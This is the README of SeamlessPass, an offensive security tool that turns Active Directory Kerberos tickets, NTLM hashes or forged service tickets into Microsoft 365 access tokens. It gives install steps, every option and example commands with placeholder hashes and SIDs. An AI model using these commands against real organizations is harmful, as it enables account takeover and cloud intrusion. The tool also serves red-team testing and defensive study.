SeamlessPass is a tool designed to obtain Microsoft 365 access tokens using on-premises Active Directory Kerberos tickets for organizations with Seamless SSO (Desktop SSO) enabled.
These tokens can be used for further interaction with Microsoft 365 services via APIs or other tools like ROADTools and AADInternals for more offensive capabilities.
More information about the theory and use case scenarios can be found at the blog post
Installation
SeamlessPass can be installed using PyPI or from the source. After installation, the tool will be available using seamlesspass
command.
Using PyPI
pip install seamlesspass
From Source
- Download source code (as archive or using
git clone https://github.com/Malcrove/SeamlessPass.git
) - Navigate to the code directory
- Install using
pip install .
, or install requirementspip install -r requirements.txt
then run directly usingpython run.py
Usage
_____ _ _____
/ ____| | | | __ \ v(0.1)
| (___ ___ __ _ _ __ ___ | | ___ ___ ___| |__) |_ _ ___ ___
\___ \ / _ \/ _` | '_ ` _ \| |/ _ \/ __/ __| ___/ _` / __/ __|
____) | __/ (_| | | | | | | | __/\__ \__ \ | | (_| \__ \__ \
|_____/ \___|\__,_|_| |_| |_|_|\___||___/___/_| \__,_|___/___/
By Abood Nour (@0xSyndr0me) - Malcrove (https://malcrove.com/)
Leveraging Kerberos tickets to get cloud access tokens using Seamless SSO
Usage: seamlesspass [-t tenant domain] [-r resource URI] [-c client_id] [-ignore-sso-check] [-d domain] [-dc DC host/IP] [-u username] [-p password] [-n [LMHASH:]NTHASH] [-aes AESKey] [-tgt base64 TGT / TGT file] [-tgs base64 TGS / TGS file] [-spn SPN] [-domain-sid SID] [-user-rid number] [-user-sid SID] [-adssoacc-ntlm [LMHASH:]NTHASH] [-adssoacc-aes AESKey] [-proxy [scheme]://[user:password]@[host]:[port]] [-ua USERAGENT] [-debug] [-no-color] [-h]
Microsoft 365 options:
-t/-tenant tenant domain
Domain of the tenant (e.g. example.com, corp.onmicrosoft.com)
-r/-resource resource URI
Target cloud service to be accessed (Default: https://graph.windows.net)
-c/-client-id client_id
Microsoft 365 client ID (Default: 1b730954-1685-4b74-9bfd-dac224a7b894)
-ignore-sso-check Try to login using Seamless SSO even if it is not enabled
Authentication Options:
-d/-domain domain
Local domain (e.g., corp.local)
-dc/-dc-ip DC host/IP
Hostname or IP Address of the domain controller used for authentication (example: dc.corp.local, 10.0.1.2)
-u/-username username
-p/-password password
-n/-ntlm [LMHASH:]NTHASH
User's NTLM hashed password, format is [LMHASH:]NTHASH
-aes AESKey User's AES 128/256 key
-tgt base64 TGT / TGT file
base64-encoded Ticket-Granting Ticket (TGT) or path to TGT file (kirbi/ccache)
-tgs base64 TGS / TGS file
base64-encoded Service Ticket (TGS) or path to TGS file (kirbi/ccache)
-spn SPN Target service principal name. (Default: HTTP/autologon.microsoftazuread-sso.com)
Ticket Forgery Options:
-domain-sid SID
Domain Security Identifier
-user-rid number
User Relative ID (Last part of user SID)
-user-sid SID
User Security Identifier
-adssoacc-ntlm [LMHASH:]NTHASH
NTLM hash of AZUREADSSOACC account (Used to forge TGS)
-adssoacc-aes AESKey
AES 128/256 Key of AZUREADSSOACC account (Used to forge TGS)
Connection Options:
-proxy [scheme]://[user:password]@[host]:[port]
NOTE: This is used only for HTTP requests not DC communication. (example: http://burp:8080)
-ua/-user-agent USERAGENT
HTTP User agent used in interaction with Microsoft 365 APIs
Misc options:
-debug Turn debug output on
-no-color Turn off console colors
-h/--help Show this help message and exit.
Examples:
seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -tgt <base64_encoded_TGT>
seamlesspass -tenant corp.com -tgs user_tgs.ccache
seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -username user -ntlm DEADBEEFDEADBEEFDEADBEEFDEADBEEF
seamlesspass -tenant corp.com -domain corp.local -dc 10.0.1.2 -username user -password password
seamlesspass -tenant corp.com -adssoacc-ntlm DEADBEEFDEADBEEFDEADBEEFDEADBEEF -user-sid S-1-5-21-1234567890-1234567890-1234567890-1234
seamlesspass -tenant corp.com -adssoacc-aes DEADBEEFDEADBEEFDEADBEEFDEADBEEF -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -user-rid 1234
For more information click here.